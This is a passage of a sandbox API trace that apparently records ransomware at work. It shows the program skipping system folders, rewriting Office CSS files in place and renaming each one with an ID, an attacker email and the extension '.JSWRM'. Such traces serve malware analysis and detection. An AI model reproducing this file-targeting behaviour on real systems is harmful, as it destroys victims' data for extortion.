1 [0116.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.777] CloseHandle (hObject=0x314) returned 1 [0116.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0116.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0116.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0116.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0116.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0116.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0116.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.777] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME07.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme07.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME07.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme07.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0116.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0116.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0116.778] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab4f04e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab4f04e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab9b4b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f998, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME08.CSS", cAlternateFileName="")) returned 1 [0116.778] lstrcmpiW (lpString1="SCHEME08.CSS", lpString2=".") returned 1 [0116.778] lstrcmpiW (lpString1="SCHEME08.CSS", lpString2="..") returned 1 [0116.778] lstrcmpiW (lpString1="SCHEME08.CSS", lpString2="...") returned 1 [0116.778] lstrcmpiW (lpString1="SCHEME08.CSS", lpString2="windows") returned -1 [0116.778] lstrcmpiW (lpString1="SCHEME08.CSS", lpString2="recovery") returned 1 [0116.778] lstrcmpiW (lpString1="SCHEME08.CSS", lpString2="perflogs") returned 1 [0116.778] lstrcmpiW (lpString1="SCHEME08.CSS", lpString2="documents and settings") returned 1 [0116.778] lstrcmpiW (lpString1="SCHEME08.CSS", lpString2="$RECYCLE.BIN") returned 1 [0116.778] lstrcmpiW (lpString1="SCHEME08.CSS", lpString2="system volume information") returned -1 [0116.778] lstrcmpiW (lpString1="SCHEME08.CSS", lpString2="msocache") returned 1 [0116.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0116.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME08.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME08.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME08.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0116.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0116.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME08.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME08.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME08.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0116.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0116.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0116.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0116.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME08.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme08.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0116.785] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=129432) returned 1 [0116.785] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f990) returned 0x24c1d0 [0116.785] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f990, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1f990, lpOverlapped=0x0) returned 1 [0116.794] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.794] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f990, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1f990, lpOverlapped=0x0) returned 1 [0116.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.794] CloseHandle (hObject=0x314) returned 1 [0116.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0116.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0116.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0116.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0116.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0116.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0116.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.795] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME08.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme08.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME08.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme08.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0116.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0116.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0116.815] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20444, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME09.CSS", cAlternateFileName="")) returned 1 [0116.815] lstrcmpiW (lpString1="SCHEME09.CSS", lpString2=".") returned 1 [0116.815] lstrcmpiW (lpString1="SCHEME09.CSS", lpString2="..") returned 1 [0116.815] lstrcmpiW (lpString1="SCHEME09.CSS", lpString2="...") returned 1 [0116.815] lstrcmpiW (lpString1="SCHEME09.CSS", lpString2="windows") returned -1 [0116.815] lstrcmpiW (lpString1="SCHEME09.CSS", lpString2="recovery") returned 1 [0116.815] lstrcmpiW (lpString1="SCHEME09.CSS", lpString2="perflogs") returned 1 [0116.815] lstrcmpiW (lpString1="SCHEME09.CSS", lpString2="documents and settings") returned 1 [0116.815] lstrcmpiW (lpString1="SCHEME09.CSS", lpString2="$RECYCLE.BIN") returned 1 [0116.815] lstrcmpiW (lpString1="SCHEME09.CSS", lpString2="system volume information") returned -1 [0116.815] lstrcmpiW (lpString1="SCHEME09.CSS", lpString2="msocache") returned 1 [0116.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0116.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME09.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME09.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME09.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0116.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0116.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME09.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME09.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME09.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0116.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0116.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0116.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0116.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME09.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme09.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0116.817] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=132164) returned 1 [0116.817] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20440) returned 0x24c1d0 [0116.817] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x20440, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x20440, lpOverlapped=0x0) returned 1 [0116.972] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.972] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x20440, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x20440, lpOverlapped=0x0) returned 1 [0116.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.973] CloseHandle (hObject=0x314) returned 1 [0116.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0116.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0116.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0116.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0116.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0116.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0116.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.973] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME09.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme09.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME09.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme09.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0116.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0116.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0116.975] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa50cd6f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa50cd6f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab9b4b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2072a, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME10.CSS", cAlternateFileName="")) returned 1 [0116.975] lstrcmpiW (lpString1="SCHEME10.CSS", lpString2=".") returned 1 [0116.975] lstrcmpiW (lpString1="SCHEME10.CSS", lpString2="..") returned 1 [0116.975] lstrcmpiW (lpString1="SCHEME10.CSS", lpString2="...") returned 1 [0116.975] lstrcmpiW (lpString1="SCHEME10.CSS", lpString2="windows") returned -1 [0116.975] lstrcmpiW (lpString1="SCHEME10.CSS", lpString2="recovery") returned 1 [0116.975] lstrcmpiW (lpString1="SCHEME10.CSS", lpString2="perflogs") returned 1 [0116.975] lstrcmpiW (lpString1="SCHEME10.CSS", lpString2="documents and settings") returned 1 [0116.975] lstrcmpiW (lpString1="SCHEME10.CSS", lpString2="$RECYCLE.BIN") returned 1 [0116.975] lstrcmpiW (lpString1="SCHEME10.CSS", lpString2="system volume information") returned -1 [0116.975] lstrcmpiW (lpString1="SCHEME10.CSS", lpString2="msocache") returned 1 [0116.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0116.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME10.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME10.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME10.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0116.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0116.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME10.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME10.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME10.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0116.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0116.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0116.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0116.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME10.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme10.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0116.976] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=132906) returned 1 [0116.976] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20720) returned 0x24c1d0 [0116.976] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x20720, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x20720, lpOverlapped=0x0) returned 1 [0116.987] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.987] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x20720, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x20720, lpOverlapped=0x0) returned 1 [0116.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.987] CloseHandle (hObject=0x314) returned 1 [0116.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0116.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0116.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0116.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0116.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0116.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: 